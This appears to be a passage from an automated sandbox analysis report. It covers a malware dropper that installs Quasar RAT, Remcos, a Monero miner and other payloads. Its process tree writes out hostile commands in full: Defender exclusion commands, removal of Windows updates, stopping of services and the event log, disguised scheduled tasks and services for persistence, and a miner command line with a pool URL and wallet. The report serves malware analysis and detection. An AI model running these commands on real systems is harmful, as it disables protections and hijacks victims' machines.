mac.exe Token: SeSystemProfilePrivilege 4044 mac.exe Token: SeSystemtimePrivilege 4044 mac.exe Token: SeProfSingleProcessPrivilege 4044 mac.exe Token: SeIncBasePriorityPrivilege 4044 mac.exe Token: SeCreatePagefilePrivilege 4044 mac.exe Token: SeBackupPrivilege 4044 mac.exe Token: SeRestorePrivilege 4044 mac.exe Token: SeShutdownPrivilege 4044 mac.exe Token: SeDebugPrivilege 4044 mac.exe Token: SeSystemEnvironmentPrivilege 4044 mac.exe Token: SeRemoteShutdownPrivilege 4044 mac.exe Token: SeUndockPrivilege 4044 mac.exe Token: SeManageVolumePrivilege 4044 mac.exe Token: 33 4044 mac.exe Token: 34 4044 mac.exe Token: 35 4044 mac.exe Token: 36 4044 mac.exe Token: SeIncreaseQuotaPrivilege 4044 mac.exe Token: SeSecurityPrivilege 4044 mac.exe Token: SeTakeOwnershipPrivilege 4044 mac.exe Token: SeLoadDriverPrivilege 4044 mac.exe Token: SeSystemProfilePrivilege 4044 mac.exe Token: SeSystemtimePrivilege 4044 mac.exe Token: SeProfSingleProcessPrivilege 4044 mac.exe Token: SeIncBasePriorityPrivilege 4044 mac.exe Token: SeCreatePagefilePrivilege 4044 mac.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 5728 svchost.exe 5728 svchost.exe -
Suspicious use of SetWindowsHookEx 28 IoCs
pid Process 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 1984 fuck.exe 2556 remcos_a2.exe 1768 Client-base.exe 996 comctl32.exe 1908 Windows Defender SmartScreen (32 bit).exe 5264 comctl32.exe 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 2604 EXCEL.EXE 1984 fuck.exe 2556 remcos_a2.exe 1768 Client-base.exe 996 comctl32.exe 1908 Windows Defender SmartScreen (32 bit).exe 5264 comctl32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1112 wrote to memory of 4292 1112 New Text Document mod.exe 82 PID 1112 wrote to memory of 4292 1112 New Text Document mod.exe 82 PID 1112 wrote to memory of 1996 1112 New Text Document mod.exe 84 PID 1112 wrote to memory of 1996 1112 New Text Document mod.exe 84 PID 1112 wrote to memory of 1996 1112 New Text Document mod.exe 84 PID 1996 wrote to memory of 2736 1996 Synaptics.exe 85 PID 1996 wrote to memory of 2736 1996 Synaptics.exe 85 PID 4292 wrote to memory of 5112 4292 ._cache_New Text Document mod.exe 90 PID 4292 wrote to memory of 5112 4292 ._cache_New Text Document mod.exe 90 PID 4292 wrote to memory of 5112 4292 ._cache_New Text Document mod.exe 90 PID 2736 wrote to memory of 988 2736 ._cache_Synaptics.exe 94 PID 2736 wrote to memory of 988 2736 ._cache_Synaptics.exe 94 PID 2736 wrote to memory of 988 2736 ._cache_Synaptics.exe 94 PID 2736 wrote to memory of 2636 2736 ._cache_Synaptics.exe 97 PID 2736 wrote to memory of 2636 2736 ._cache_Synaptics.exe 97 PID 2736 wrote to memory of 2636 2736 ._cache_Synaptics.exe 97 PID 2736 wrote to memory of 1984 2736 ._cache_Synaptics.exe 98 PID 2736 wrote to memory of 1984 2736 ._cache_Synaptics.exe 98 PID 2736 wrote to memory of 1984 2736 ._cache_Synaptics.exe 98 PID 2736 wrote to memory of 2556 2736 ._cache_Synaptics.exe 99 PID 2736 wrote to memory of 2556 2736 ._cache_Synaptics.exe 99 PID 2736 wrote to memory of 2556 2736 ._cache_Synaptics.exe 99 PID 4292 wrote to memory of 1112 4292 ._cache_New Text Document mod.exe 100 PID 4292 wrote to memory of 1112 4292 ._cache_New Text Document mod.exe 100 PID 5112 wrote to memory of 4376 5112 NewApp.exe 101 PID 5112 wrote to memory of 4376 5112 NewApp.exe 101 PID 5112 wrote to memory of 4376 5112 NewApp.exe 101 PID 988 wrote to memory of 4856 988 Updater.exe 103 PID 988 wrote to memory of 4856 988 Updater.exe 103 PID 988 wrote to memory of 4856 988 Updater.exe 103 PID 2636 wrote to memory of 1200 2636 4909_7122.exe 107 PID 2636 wrote to memory of 1200 2636 4909_7122.exe 107 PID 2636 wrote to memory of 1200 2636 4909_7122.exe 107 PID 2636 wrote to memory of 1200 2636 4909_7122.exe 107 PID 2636 wrote to memory of 1200 2636 4909_7122.exe 107 PID 1960 wrote to memory of 2296 1960 cmd.exe 117 PID 1960 wrote to memory of 2296 1960 cmd.exe 117 PID 5112 wrote to memory of 4816 5112 NewApp.exe 143 PID 5112 wrote to memory of 4816 5112 NewApp.exe 143 PID 3388 wrote to memory of 2908 3388 cmd.exe 149 PID 3388 wrote to memory of 2908 3388 cmd.exe 149 PID 3820 wrote to memory of 2984 3820 Updater.exe 161 PID 3820 wrote to memory of 2984 3820 Updater.exe 161 PID 3820 wrote to memory of 2984 3820 Updater.exe 161 PID 3820 wrote to memory of 2984 3820 Updater.exe 161 PID 3820 wrote to memory of 2984 3820 Updater.exe 161 PID 3820 wrote to memory of 2984 3820 Updater.exe 161 PID 3820 wrote to memory of 2984 3820 Updater.exe 161 PID 3820 wrote to memory of 2984 3820 Updater.exe 161 PID 3820 wrote to memory of 2984 3820 Updater.exe 161 PID 3820 wrote to memory of 3316 3820 Updater.exe 166 PID 3820 wrote to memory of 3316 3820 Updater.exe 166 PID 3820 wrote to memory of 3316 3820 Updater.exe 166 PID 3820 wrote to memory of 3316 3820 Updater.exe 166 PID 3820 wrote to memory of 3316 3820 Updater.exe 166 PID 2736 wrote to memory of 3032 2736 ._cache_Synaptics.exe 168 PID 2736 wrote to memory of 3032 2736 ._cache_Synaptics.exe 168 PID 2736 wrote to memory of 3032 2736 ._cache_Synaptics.exe 168 PID 2736 wrote to memory of 1912 2736 ._cache_Synaptics.exe 169 PID 2736 wrote to memory of 1912 2736 ._cache_Synaptics.exe 169 PID 2736 wrote to memory of 1912 2736 ._cache_Synaptics.exe 169 PID 4292 wrote to memory of 4756 4292 ._cache_New Text Document mod.exe 170 PID 4292 wrote to memory of 4756 4292 ._cache_New Text Document mod.exe 170 PID 4292 wrote to memory of 4756 4292 ._cache_New Text Document mod.exe 170 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"1⤵
- Quasar RAT
- Checks computer location settings
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Users\Admin\AppData\Local\Temp\a\NewApp.exe"C:\Users\Admin\AppData\Local\Temp\a\NewApp.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Fasyer', 'C:\Users', 'C:\ProgramData'"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
C:\Fasyer\lopads.exe"C:\Fasyer\lopads.exe"4⤵
- Executes dropped EXE
PID:4816
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\yuksefyj.exe"C:\Users\Admin\AppData\Local\Temp\a\yuksefyj.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:1112 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2296
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:3028
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3308
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:3240
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:3400
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3056
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:728
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"4⤵
- Launches sc.exe
PID:4744
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:1440
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3872
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"4⤵
- Launches sc.exe
PID:740
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4756 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4988
-
-
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:996 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gplQ0IiucTw7.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:4360 -
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
- System Location Discovery: System Language Discovery
PID:2096
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3140
-
-
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5264 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\J8tCFjSdT62f.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:5516 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:1196
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5000
-
-
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"8⤵PID:5652
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5264 -s 22127⤵
- Program crash
PID:5548
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 22285⤵
- Program crash
PID:4300
-
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\a\Updater.exe"C:\Users\Admin\AppData\Local\Temp\a\Updater.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Fasyer', 'C:\Users'"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe"C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe"C:\Users\Admin\AppData\Local\Temp\a\4909_7122.exe"5⤵
- Executes dropped EXE
PID:1200
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\fuck.exe"C:\Users\Admin\AppData\Local\Temp\a\fuck.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe"C:\Users\Admin\AppData\Local\Temp\a\remcos_a2.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2556
-
-
C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 20006⤵
- Program crash
PID:5160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe"C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:3284 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\13ad6dcf-4910-42bb-bff7-ec9477a501e7.bat"6⤵PID:5344
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:5448
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 32847⤵
- Kills process with taskkill
PID:5616
-
-
C:\Windows\system32\timeout.exetimeout /T 2 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:4564
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1768 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2452
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1864 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3064
-
-
C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1908 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Maps connected drives based on registry
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Enumerates system info in registry
PID:2972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
C:\Windows\SYSTEM32\SCHTASKS.exeSCHTASKS /CREATE /TN "System-cb832607b4" /TR "C:\Windows\System32\System-cb832607b4.exe" /SC ONLOGON /RL HIGHEST /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:380
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe5⤵
- Suspicious use of SetThreadContext
PID:5636 -
C:\Windows\System32\powercfg.exepowercfg -change standby-timeout-ac 06⤵
- Power Settings
PID:6004
-
-
C:\Windows\System32\powercfg.exepowercfg -change monitor-timeout-ac 06⤵
- Power Settings
PID:6012
-
-
C:\Windows\System32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 06⤵
- Power Settings
PID:6020
-
-
C:\Windows\System32\powercfg.exepowercfg /setactive SCHEME_CURRENT6⤵
- Power Settings
PID:6028
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber6⤵PID:6036
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber6⤵PID:5172
-
-
C:\Windows\System32\curl.execurl -s https://api.ipify.org6⤵PID:3452
-
-
C:\Windows\System32\curl.execurl -s http://ipinfo.io/country6⤵PID:5188
-
-
C:\Windows\System32\curl.execurl -s https://api.ipify.org6⤵PID:5548
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber6⤵PID:5808
-
-
C:\Windows\System32\curl.execurl -s http://ipinfo.io/country6⤵PID:5916
-
-
C:\Windows\System32\svchost.exe"C:\Windows\System32\svchost.exe" --algo rx/0 --url xmr-us-east1.nanopool.org:10300 --user 455XKVg4JQh4Xc2bjPBWb2Uv1jhxvJnJAWWWWN3puzwtJP85MCHyuBFaZ5SL1nXGgqeoijsLjwNqSdAAJ4zrLNLnB3J7DXj/lunar --cpu-max-threads-hint=1006⤵
- Suspicious use of FindShellTrayWindow
PID:5728
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5752
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:1480
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:3820
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:2148
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:1336
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5316
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5468
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5512
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5536
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5400
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5700
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5764
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5960
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5836
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5856
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5760
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5260
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5672
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:6080
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:6024
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:6020
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:6060
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:6004
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5144
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:6036
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:1888
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:2652
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5180
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:3100
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:4560
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:824
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:1128
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5368
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:3592
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:5428
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\mac.exe"C:\Users\Admin\AppData\Local\Temp\a\mac.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4044
-
-
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2452 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:4816 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4960
-
-
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4856
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2604
-
C:\ProgramData\GoogleUP\Chrome\Updater.exeC:\ProgramData\GoogleUP\Chrome\Updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2908
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3448
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2336
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4724
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2240
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2984
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
